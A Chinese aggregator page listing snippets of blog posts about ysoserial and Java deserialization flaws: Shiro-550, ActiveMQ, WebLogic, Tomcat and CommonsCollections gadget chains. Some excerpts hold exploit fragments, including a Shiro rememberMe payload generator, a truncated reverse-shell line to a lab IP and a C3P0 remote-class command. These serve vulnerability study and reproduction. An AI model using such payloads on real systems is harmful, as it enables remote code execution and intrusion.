E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
Ysoserial
Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)复现
ShiroRememberMe1.2.4反序列化漏洞(Shiro-550,CVE-2016-4437)复现前言开始环境搭建工具准备1.shiro_poc.py2.
ysoserial
的jar文件安装模块开始执行参考文章前言接下来一段时间要做漏洞复现和代码审计
whojoe
·
2020-08-16 14:34
漏洞复现
web安全
CVE-2020-9484 tomcat session反序列化漏洞分析
分析漏洞成因以及补丁修补情况,以及分析
ysoserial
反序列化链。
合天智汇
·
2020-08-09 11:20
Java unserialize serialized Object(AnnotationInvocationHandler、
ysoserial
) In readObject() LeadTo Inv.
JavaunserializeserializedObject(AnnotationInvocationHandler、
ysoserial
)InreadObject()LeadToTransformedMapChangeLeadToInvokerTransformer
weixin_30270561
·
2020-08-04 03:59
java 使用 idea 调试
ysoserial
以https://github.com/frohoff/
ysoserial
为例,下载源码,然后用IntellijIDEA打开。
whatday
·
2020-08-03 08:04
BurpWeb安全学院之不安全的反序列化
PHP序列化格式1.2Java序列化格式2.操作序列化对象2.1.修改对象属性介绍实验2.2.修改数据类型介绍实验3.利用网站程序功能4.魔术方法5.注入任意对象介绍实验6.Gadgetchains7.
ysoserial
8
l0nmar
·
2020-07-29 08:24
web漏洞
手工编写简化版CommonsCollections6,带你实现Java8全版本反序列化利用
本文带大家编写一个简化版的CommonsCollections6利用链,代码量相比于
ysoserial
减少50%,能够让大家更好理解。
落沐萧萧
·
2020-07-24 10:00
字符串
java
redis
javascript
jvm
YSOSERIAL
Payloads分析笔记(1)
前言
YSOSERIAL
=
YSOSERIAL
?为什么这么序列化?其它没啥好说的,自己再看一遍,慢慢的往里面填肉。
fnmsd
·
2020-07-15 23:25
Java
安全
修改
ysoserial
使其支持生成代码执行Payload
ysoserial
是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。
fnmsd
·
2020-07-15 23:53
Java
安全
weblogic反序列化基本概念
ysoserial
生成的payload,为序列化文件Writeobject():若非序列化数据,则首先经过writeobject()进行序列化Readobject():反序列化数据一:所谓序列化,
sojrs_sec
·
2020-07-13 13:39
web安全
Apache Shiro漏洞复现
importsysimportuuidimportbase64importsubprocessfromCrypto.CipherimportAESimportrequests#copytoclipboarddefencode_rememberme(command):popen=subprocess.Popen(['java','-jar','
ysoserial
weixin_30883311
·
2020-07-12 07:10
Apache Shiro Java反序列化漏洞分析
1.前言最近工作上刚好碰到了这个漏洞,当时的漏洞环境是:shiro-core1.2.4commons-beanutils1.9.1最终利用
ysoserial
的CommonsBeanutils1命令执行。
weixin_30569153
·
2020-07-12 06:33
Apache Shiro 反序列化RCE漏洞
gitclonehttps://github.com/apache/shiro.gitgitcheckoutshiro-root-1.2.4工具下载gitclonehttps://github.com/frohoff/
ysoserial
.gitcdysoseri
weixin_30326741
·
2020-07-10 18:53
Apache Shiro反序列化远程代码执行 复现 环境搭建
1dockerrun-d-p5001:8080medicean/vulapps:s_shiro_1生成payoad:yuminstallmaven-ygitclonehttps://github.com/frohoff/
ysoserial
.gitcdysoserial
#Mr.liao
·
2020-07-10 18:40
Python
网络安全
ysoserial
exploit/JRMPClient原理剖析
0前言
ysoserial
中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:1、先往存在漏洞的服务器发送payloads/
hldfight
·
2020-07-10 01:11
java代码审计
ysoserial
exploit/JRMPListener原理剖析
ysoserialexploit/JRMPListener原理剖析0前言1payloads/JRMPClient1.1Externalizable1.2生成payload1.3gadget链分析2exploit/JRMPListener3总结0前言上一篇文章讲了ysoserialexploit/JRMPClient的原理,本篇接着讲一下ysoserialexploit/JRMPListener的原
hldfight
·
2020-07-10 01:11
java代码审计
shiro反序列化漏洞分析、模拟攻击及修复(二)
shiro反序列化漏洞模拟攻击shiro反序列化漏洞分析、模拟攻击及修复(一)shiro反序列化漏洞分析、模拟攻击及修复(三)得知cookie的流程后,我们可以根据其处理流程进行恶意请求数据构造,首先使用
ysoserial
欢脱的婷子
·
2020-06-28 20:05
反序列化工具
ysoserial
使用介绍
反序列化工具
ysoserial
使用介绍0x00
ysoserial
是什么?
weixin_34275734
·
2020-06-28 15:28
漫谈Commons-Collections反序列化
如果你没有学习分析过
ysoserial
--Gadget--URLDNS,建议你看笔者之前发过的文章学习一下。如果你是大佬,前面当笔者没说。
明月清水
·
2020-06-26 15:37
反序列化
代码审计
Apache Shiro Java反序列化漏洞复现-踩坑记录
tcp/192.168.77.149/88880>&1然后在http://www.jackson-t.ca/runtime-exec-payloads.html上进行java反序列化绕过base64编码
ysoserial
飞鱼的企鹅
·
2020-06-25 22:57
漏洞复现
java反序列化漏洞实战
dnschef,DNS代理
ysoserial
.jar生成payload.简单的python脚本,调用
ysoserial
.jar并发送payload首先域名增加一条A记录解析到公网IP服务,然后增加一条NS
weixin_34009794
·
2020-06-21 11:04
使用
ysoserial
生成反序列化文件
感谢清水大佬的帮助,这个代码是他的importjava.io.FileInputStream;importjava.io.FileOutputStream;importjava.io.ObjectInputStream;importjava.io.ObjectOutputStream;importysoserial.payloads.CommonsBeanutils1;publicclassTes
niexinming
·
2020-06-01 12:45
安全
安全
Shiro反序列化漏洞检测、dnslog
pipinstallpycryptoimportsysimportbase64importuuidfromrandomimportRandomimportsubprocessfromCrypto.CipherimportAESdefencode_rememberme(command):popen=subprocess.Popen(['java','-jar','
ysoserial
Mysticbinary
·
2020-05-05 16:00
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
2.漏洞复现漏洞利用过程如下:构造(可以使用
ysoserial
)可执行命令的序列化对象作为一个消息,发送给目标
ffx_1
·
2020-04-07 16:00
ysoserial
-C3P0 分析
环境准备:pom:com.mchangec3p00.9.5.2payload生成:java-jarysoserial.jarC3P0"http://127.0.0.1:8989/:Exploit">test.ser//加载Exploit.class调用链分析:exec处下断点,整个调用链如下图所示:反序列化的入口点时com/mchange/v2/c3p0/impl/PoolBackedDataSo
tr1ple
·
2020-04-02 00:00
ysoserial
-CommonsCollections系列总结篇
www.anquanke.com/post/id/200637前言:网上分析CommonsCollections调用链的文章也有不少,但是看完分析文章直接手动构造利用链仍有难度,因此这篇文章主要总结本人调试
ysoserial
tr1ple
·
2020-03-25 11:00
ysoserial
源码结构分析
那么学习一下这个项目是如何设计的也挺重要,多学习大佬如何写代码应该也能对自己的代码能力有提升吧~23332.项目结构:首先代码结构如上图所示exploit文件夹下主要是放一些主要的利用模块,比如如下两个例子这里用java-cp指定在包
ysoserial
tr1ple
·
2020-03-09 22:00
java反序列化-
ysoserial
-调试分析总结篇(7)
前言:CommonsCollections7外层也是一条新的构造链,外层由hashtable的readObject进入,这条构造链挺有意思,因为用到了hash碰撞yso构造分析:首先构造进行rce所需要的转换链,这里也用的是chianed里面套Constantrans+invoketrans的方法接着构造两个hashmap,通过lazymap的decorate用chained进行装饰后放进hash
tr1ple
·
2020-03-06 22:00
java反序列化-
ysoserial
-调试分析总结篇(6)
前言:这篇记录CommonsCollections6的调试,外层也是新的类,换成了hashset,即从hashset触发其readObject(),yso给的调用链如下图所示利用链分析:首先在hashset内部首先获取器容量与负载因子等操作,然后创建hashmap,将ObjectinputStream中的对象放到hashmap中,即调用hashmap.put函数,可以看到此时实际上放进去的是一个T
tr1ple
·
2020-03-05 22:00
java反序列化-
ysoserial
-调试分析总结篇(5)
前言:这篇文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribute该类要求没有配置securitymanager利用链分析:首先在badAttribute的readObject中,调用了valObj.toString(),其中valObj中存储TiedMapEntr
tr1ple
·
2020-03-04 23:00
java反序列化-
ysoserial
-调试分析总结篇(4)
1.前言这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意缩减版的函数调用栈如下图所示:2.利用链分析:调用还是从PriorityQueue.rea
tr1ple
·
2020-03-03 22:00
java反序列化-
ysoserial
-调试分析总结篇(3)
前言:这篇文章主要分析commoncollections3,这条利用链如yso描述,这个与cc1类似,只是反射调用方法是用的不是invokeTransformer而用的是InstantiateTransformer,整个调用过程如下图利用链分析:如上图所示,入口点还是Annotationinvoationhandler的Entryset此时将会调用membervalues.get,其中var4位e
tr1ple
·
2020-03-01 21:00
java反序列化-
ysoserial
-调试分析总结篇(2)
前言:这篇主要分析commonCollections2,调用链如下图所示:调用链分析:分析环境:jdk1.8.0反序列化的入口点为src.zip!/java/util/PriorityQueue.java此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类接下来调用siftDownUsingConparator函数在这里将调用Transfo
tr1ple
·
2020-02-29 20:00
java反序列化-
ysoserial
-调试分析总结篇(1)
前言:
ysoserial
很强大,花时间好好研究研究其中的利用链对于了解java语言的一些特性很有帮助,也方便打好学习java安全的基础,刚学反序列化时就分析过commoncollections,但是是跟着网上教程
tr1ple
·
2020-02-28 21:00
关于JDK高版本下RMI、LDAP+JNDI bypass的一点笔记
\
ysoserial
.jarysoserial.exploit.RMIRegistryExploit127.0.0.19999Commo
tr1ple
·
2020-02-20 12:00
Apache Shiro 反序列化漏洞利用工具使用
工具下载地址:Shiro_Exploit该脚本通过网络收集到的22个key,利用
ysoserial
工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。
「已注销」
·
2020-02-15 20:32
关于RMI+LDAP+JNDI高版本注入bypass的一些总结
\
ysoserial
.jarysoserial.exploit.RMIRegistryEx
tr1ple
·
2020-01-29 12:00
从0到1掌握某Json-TemplatesImpl链与
ysoserial
-jdk7u21的前因后果
本篇文章主要分析FastJson1.2.24中针对TemplatesImpl链的构造原理以及
ysoserial
中针对jdk7u21基于TemplatesImpl加动态代理链的构造原理。
tr1ple
·
2020-01-16 16:00
[
Ysoserial
] 错误: 找不到或无法加载主类 解决办法
这几天在实习碰到的差不多都是java的审计于是就想学习一下java的反序列化下载了
Ysoserial
可是一直会有一个错误爆出来错误:找不到或无法加载主类
ysoserial
.payloads.CommonsCollections5
ckj123
·
2019-12-17 02:14
利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)
JmeterRMI反序列化命令执行漏洞(CVE-2018-1297)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现利用
ysoserial
检查结果Vulnhub官方复现教程https://vulhub.org
江不流
·
2019-07-11 17:03
渗透
PHPGGC学习----理论
本文首发于先知:https://xz.aliyun.com/t/5450PHPGGC是一款能够自动生成主流框架的序列化测试payload的工具,类似Java中的
ysoserial
,当前支持的框架包括Doctrine
tr1ple
·
2019-06-24 09:00
反序列化工具
ysoserial
使用介绍
反序列化工具
ysoserial
使用介绍0x00
ysoserial
是什么?
wx5b0b88843cb2a
·
2018-08-10 15:49
ysoserial
使用
介绍
工具
java反序列化工具
ysoserial
分析
然而,在下载老外的
ysoserial
工具并仔细看看后,我发现了许多值得学习的知识。
angelwhu
·
2016-04-01 02:00
漏洞分析
JAVA反序列化exp及使用方法
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/
ysoserial
这个项目针对不同的java
Xyntax
·
2015-12-09 23:51
渗透测试
JAVA反序列化exp及使用方法
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/
ysoserial
这个项目针对不同的java
cd_xuyue
·
2015-12-09 23:00
java
漏洞
jboss
websphere
Java unserialize serialized Object(AnnotationInvocationHandler、
ysoserial
) In readObject() LeadTo InvokerTransformer
JavaunserializeserializedObject(AnnotationInvocationHandler、
ysoserial
)InreadObject()LeadToTransformedMapChangeLeadToInvokerTransformer
.Little Hann
·
2015-11-16 12:00
Java unserialize serialized Object(AnnotationInvocationHandler、
ysoserial
) In readObject() LeadTo InvokerTransformer
JavaunserializeserializedObject(AnnotationInvocationHandler、
ysoserial
)InreadObject()LeadToTransformedMapChangeLeadToInvokerTransformer
.Little Hann
·
2015-11-16 12:00
上一页
1
2
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他